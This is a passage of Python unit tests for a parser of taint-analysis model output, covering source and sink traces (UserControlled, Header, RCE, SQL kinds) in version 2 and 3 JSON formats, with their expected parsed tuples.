line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
],
)
def testSourceModelV3(self) -> None:
# User-declared source.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"decl": null,
"kinds": [
{
"kind": "UserControlled",
"features": [ { "always-via": "user-declared" } ]
}
]
}
]
}
]
}
}
""",
expected=[],
)
# Direct source.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"local_features": [ { "always-via": "source-local" } ],
"kinds": [
{
"kind": "UserControlled",
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "direct-source" } ]
},
{
"kind": "Header",
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "other-direct-source" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0), ("Header", 0)],
caller_port="result",
callee_port="source",
type_interval=None,
features=[ParseTraceFeature("always-via:source-local", [])],
annotations=[],
)
],
)
# Direct source with multiple leaves.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result[attribute]",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "UserControlled",
"leaves": [
{ "name": "_user_controlled" },
{ "name": "_other_user_controlled" }
],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result[attribute]",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_other_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result[attribute]",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Direct source with ports on leaves (e.g, cross-repo),
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "UserControlled",
"leaves": [
{
"name": "_user_controlled"
},
{
"name": "_cross_repo",
"port": "producer:1:result"
},
{
"name": "_cross_repo_other",
"port": "producer:1:result"
},
{
"name": "_cross_repo",
"port": "producer:2:result"
}
],
"features": [ { "always-via": "direct-source" } ]
},
{
"kind": "Header",
"leaves": [
{
"kind": "Header",
"name": "_cross_repo",
"port": "producer:1:result"
}
],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_cross_repo",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0), ("Header", 0)],
caller_port="result",
callee_port="producer:1:result",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_cross_repo_other",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="producer:1:result",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_cross_repo",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="producer:2:result",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Indirect source.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result[field]",
"taint": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"resolves_to": [
"foo.source"
],
"port": "result[attribute]"
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "UserControlled",
"length": 2,
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "direct-source" } ]
},
{
"kind": "Header",
"length": 3,
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="foo.source",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 2), ("Header", 3)],
caller_port="result[field]",
callee_port="result[attribute]",
type_interval=None,
features=[],
annotations=[],
)
],
)
# Indirect source with multiple callees.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"resolves_to": [
"foo.source",
"foo.other_source"
],
"port": "result[attribute]"
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "UserControlled",
"length": 2,
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="foo.source",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 2)],
caller_port="result",
callee_port="result[attribute]",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="foo.other_source",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 2)],
caller_port="result",
callee_port="result[attribute]",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Mix of direct and indirect sources.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "UserControlled",
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "direct-source" } ]
}
]
},
{
"call": {
"position": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"resolves_to": [
"foo.source"
],
"port": "result[attribute]"
},
"tito": [
{ "line": 110, "start": 111, "end": 112 },
{ "line": 113, "start": 114, "end": 115 }
],
"kinds": [
{
"kind": "UserControlled",
"length": 2,
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="foo.source",
callee_location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
filename="foo.py",
titos=[
SourceLocation(line_no=110, begin_column=112, end_column=112),
SourceLocation(line_no=113, begin_column=115, end_column=115),
],
leaves=[("UserControlled", 2)],
caller_port="result",
callee_port="result[attribute]",
type_interval=None,
features=[],
annotations=[],
),
],
)
# User-declared parameter source.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "formal(x)",
"taint": [
{
"decl": null,
"kinds": [
{
"kind": "UserControlled",
"features": [ { "always-via": "user-declared" } ]
}
]
}
]
}
]
}
}
""",
expected=[],
)
# Implicit source.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"kinds": [ { "kind": "UserControlled" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="leaf",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
],
)
def testSinkModelV2(self) -> None:
# User-declared sink.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"decl": null,
"leaves": [ { "kind": "RCE" } ],
"features": [ { "always-via": "user-declared" } ]
}
]
}
]
}
}
""",
expected=[],
)
# Direct sink.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "SQL", "name": "_sql" },
{ "kind": "RCE", "name": "_sql" }
],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_sql",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("SQL", 0), ("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
)
],
)
# Direct sink with multiple leaves.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "RCE", "name": "_remote_code_execution" },
{ "kind": "RCE", "name": "_other_remote_code_execution" }
],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_remote_code_execution",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_other_remote_code_execution",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Direct sink with ports on leaves (e.g, cross-repo),
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(y)[attribute]",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{
"kind": "RCE",
"name": "_remote_code_execution"
},
{
"kind": "RCE",
"name": "_cross_repo",
"port": "producer:1:formal(x)"
},
{
"kind": "SQL",
"name": "_cross_repo",
"port": "producer:1:formal(x)"
},
{
"kind": "RCE",
"name": "_cross_repo_other",
"port": "producer:1:formal(x)"
},
{
"kind": "RCE",
"name": "_cross_repo",
"port": "producer:2:formal(x)"
}
],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_remote_code_execution",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(y)[attribute]",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_cross_repo",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0), ("SQL", 0)],
caller_port="formal(y)[attribute]",
callee_port="producer:1:formal(x)",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_cross_repo_other",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(y)[attribute]",
callee_port="producer:1:formal(x)",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_cross_repo",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(y)[attribute]",
callee_port="producer:2:formal(x)",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Indirect sink.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"resolves_to": [
"foo.sink"
],
"port": "formal(y)[attribute]",
"length": 2
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "RCE", "name": "_sink_leaf" },
{ "kind": "SQL", "name": "_sink_leaf" }
],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="foo.sink",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 2), ("SQL", 2)],
caller_port="formal(x)",
callee_port="formal(y)[attribute]",
type_interval=None,
features=[],
annotations=[],
)
],
)
# Indirect sink with multiple callees.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"resolves_to": [
"foo.sink",
"foo.other_sink"
],
"port": "formal(y)[attribute]",
"length": 2
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "RCE", "name": "_sink_leaf" },
{ "kind": "SQL", "name": "_sink_leaf" }
],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="foo.sink",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 2), ("SQL", 2)],
caller_port="formal(x)",
callee_port="formal(y)[attribute]",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="foo.other_sink",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 2), ("SQL", 2)],
caller_port="formal(x)",
callee_port="formal(y)[attribute]",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Mix of direct and indirect sinks.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "RCE", "name": "_remote_code_execution" }
],
"features": [ { "always-via": "direct-sink" } ]
},
{
"call": {
"position": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"resolves_to": [
"foo.sink"
],
"port": "formal(y)[attribute]",
"length": 2
},
"tito": [
{ "line": 110, "start": 111, "end": 112 },
{ "line": 113, "start": 114, "end": 115 }
],
"leaves": [
{ "kind": "RCE", "name": "_remote_code_execution" }
],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_remote_code_execution",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="foo.sink",
callee_location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
filename="foo.py",
titos=[
SourceLocation(line_no=110, begin_column=112, end_column=112),
SourceLocation(line_no=113, begin_column=115, end_column=115),
],
leaves=[("RCE", 2)],
caller_port="formal(x)",
callee_port="formal(y)[attribute]",
type_interval=None,
features=[],
annotations=[],
),
],
)
# User-declared return sink.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "result",
"taint": [
{
"decl": null,
"leaves": [ { "kind": "RCE" } ],
"features": [ { "always-via": "user-declared" } ]
}
]
}
]
}
}
""",
expected=[],
)
# Implicit sink.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"leaves": [ { "kind": "RCE" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="leaf",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[],
leaves=[("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
],
)
def testSinkModelV3(self) -> None:
# User-declared sink.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"decl": null,
"kinds": [
{
"kind": "RCE",
"features": [ { "always-via": "user-declared" } ]
}
]
}
]
}
]
}
}
""",
expected=[],
)
# Direct sink.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"local_features": [ { "always-via": "local-sink" } ],
"kinds": [
{
"kind": "SQL",
"leaves": [ { "name": "_sql" } ],
"features": [ { "always-via": "direct-sink" } ]
},
{
"kind": "RCE",
"leaves": [ { "name": "_sql" } ],
"features": [ { "always-via": "other-direct-sink" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_sql",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("SQL", 0), ("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[ParseTraceFeature("always-via:local-sink", [])],
annotations=[],
)
],
)
# Direct sink with multiple leaves.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "RCE",
"leaves": [
{ "name": "_remote_code_execution" },
{ "name": "_other_remote_code_execution" }
],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_remote_code_execution",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_other_remote_code_execution",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Direct sink with ports on leaves (e.g, cross-repo),
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(y)[attribute]",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "RCE",
"leaves": [
{
"name": "_remote_code_execution"
},
{
"name": "_cross_repo",
"port": "producer:1:formal(x)"
},
{
"name": "_cross_repo_other",
"port": "producer:1:formal(x)"
},
{
"name": "_cross_repo",
"port": "producer:2:formal(x)"
}
],
"features": [ { "always-via": "direct-sink" } ]
},
{
"kind": "SQL",
"leaves": [
{
"name": "_cross_repo",
"port": "producer:1:formal(x)"
}
],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_remote_code_execution",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(y)[attribute]",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_cross_repo",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0), ("SQL", 0)],
caller_port="formal(y)[attribute]",
callee_port="producer:1:formal(x)",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_cross_repo_other",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(y)[attribute]",
callee_port="producer:1:formal(x)",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_cross_repo",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(y)[attribute]",
callee_port="producer:2:formal(x)",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Indirect sink.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"resolves_to": [
"foo.sink"
],
"port": "formal(y)[attribute]"
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "RCE",
"length": 2,
"leaves": [ { "name": "_sink_leaf" } ],
"features": [ { "always-via": "direct-sink" } ]
},
{
"kind": "SQL",
"length": 3,
"leaves": [ { "name": "_sink_leaf" } ],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="foo.sink",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 2), ("SQL", 3)],
caller_port="formal(x)",
callee_port="formal(y)[attribute]",
type_interval=None,
features=[],
annotations=[],
)
],
)
# Indirect sink with multiple callees.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"resolves_to": [
"foo.sink",
"foo.other_sink"
],
"port": "formal(y)[attribute]"
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "RCE",
"length": 2,
"leaves": [ { "name": "_sink_leaf" } ],
"features": [ { "always-via": "direct-sink" } ]
},
{
"kind": "SQL",
"length": 3,
"leaves": [ { "name": "_sink_leaf" } ],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="foo.sink",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
